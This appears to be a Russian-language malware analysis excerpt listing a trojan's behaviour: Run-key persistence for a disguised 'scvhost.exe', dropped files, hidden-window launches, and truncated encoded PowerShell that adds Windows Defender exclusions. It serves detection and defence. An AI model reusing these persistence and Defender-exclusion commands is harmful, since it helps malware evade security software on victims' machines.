Техническая информация
- [<HKCU>\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] 'Microsoft Store' = '%APPDATA%\scvhost.exe'
- [<HKCU>\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] 'Skype Web' = '%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\scvhost.exe'
- %APPDATA%\microsoft\windows\start menu\programs\startup\scvhost.exe
- %APPDATA%\scvhost.exe
- %TEMP%\mailify.exe
- %APPDATA%\scvhost.exe в %APPDATA%\ctfmon.exe
- '%APPDATA%\scvhost.exe'
- '%TEMP%\mailify.exe'
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -EncodedCommand "PAAjAGYAaABmACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAcgB2ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwA...' (со скрытым окном)
- '%APPDATA%\scvhost.exe' ' (со скрытым окном)
- '%TEMP%\mailify.exe' ' (со скрытым окном)
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -EncodedCommand "PAAjAGYAaABmACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAcgB2ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwA...